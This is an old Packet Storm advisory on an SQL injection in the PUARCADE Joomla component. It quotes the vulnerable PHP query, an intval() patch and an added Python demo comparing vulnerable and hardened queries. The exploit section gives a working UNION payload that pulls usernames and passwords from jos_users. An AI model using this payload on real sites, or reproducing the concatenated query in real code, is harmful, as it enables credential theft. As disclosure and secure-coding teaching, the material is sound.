joomlapuarcade22-sql.txt

2008-04-10T00:00:00
ID PACKETSTORM:65394
Type packetstorm
Reporter MantiS
Modified 2008-04-10T00:00:00

Description

                                        
`I discovered a vulnerability in Component PUARCADE for Joomla (the last version is vulnerable).  
  
SQL injection vulnerability in puarcade.class.php <= V. 2.2, component for Joomla.  
--------------------------------------------------------------------------------------------------------------------------  
  
Author : MantiS  
---------  
  
Vulnerable code :  
------------------------  
function warningByGame($gid) {  
global $database;  
  
$query = "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM #__puarcade_games as g, #__puarcade_contentrating as c"  
. " WHERE g.contentratingid = c.id"  
. " AND g.id = $gid";  
$database->setQuery($query);  
$cont = $database->loadObjectList();  
--------------------------  
  
Exploit : http://website.com/joomla_path/index.php?option=com_puarcade&Itemid=1&gid=[SQL INJECTION]  
---------  
Can be exploited with "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns).  
  
Patch :  
--------  
Place before "$query = "SELECT c.id......... " :  
$gid = intval($_GET['gid']);  
This forces conversion of the $gid variable to an integer.  
`
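
Added example (not part of the original advisory and not PUARCADE code): a Python/sqlite3 model of the query above, showing the concatenated form next to the advisory's integer-cast fix and a bound-parameter variant. The table contents, the function names and to_int() (an approximation of PHP intval()) are assumptions made for this demo; the jos_ prefix and the payload string are taken from the advisory.

```python
import re
import sqlite3

# Payload string exactly as quoted in the advisory.
PAYLOAD = "0 UNION SELECT password,username,0,0,0 from jos_users--"

BASE = ("SELECT c.id, c.name, c.description, c.warningrequired, c.imagename"
        " FROM jos_puarcade_games AS g, jos_puarcade_contentrating AS c"
        " WHERE g.contentratingid = c.id AND g.id = ")

def make_db():
    # Constructed stand-ins for the Joomla tables named in the advisory.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE jos_puarcade_games (id INTEGER, contentratingid INTEGER);
        CREATE TABLE jos_puarcade_contentrating (id INTEGER, name TEXT,
            description TEXT, warningrequired INTEGER, imagename TEXT);
        CREATE TABLE jos_users (username TEXT, password TEXT);
        INSERT INTO jos_puarcade_games VALUES (1, 10);
        INSERT INTO jos_puarcade_contentrating
            VALUES (10, 'Teen', 'Mild violence', 1, 'teen.png');
        INSERT INTO jos_users VALUES ('admin', 'constructed-hash');
    """)
    return db

def warning_by_game_vulnerable(db, gid):
    # Same pattern as the advisory's code: request value concatenated into SQL.
    return db.execute(BASE + str(gid)).fetchall()

def to_int(value):
    # Approximates PHP intval(): leading integer if present, otherwise 0.
    m = re.match(r"\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0

def warning_by_game_cast(db, gid):
    # The advisory's fix: force gid to an integer before building the query.
    return db.execute(BASE + str(to_int(gid))).fetchall()

def warning_by_game_bound(db, gid):
    # Alternative hardening (not in the advisory): gid is bound as data and
    # never parsed as SQL.
    return db.execute(BASE + "?", (gid,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for fn in (warning_by_game_vulnerable, warning_by_game_cast,
               warning_by_game_bound):
        print(fn.__name__, fn(db, "1"), fn(db, PAYLOAD))
```

Only the concatenated version returns a row from jos_users for the advisory's payload; both hardened versions return an empty list for it while still serving gid=1.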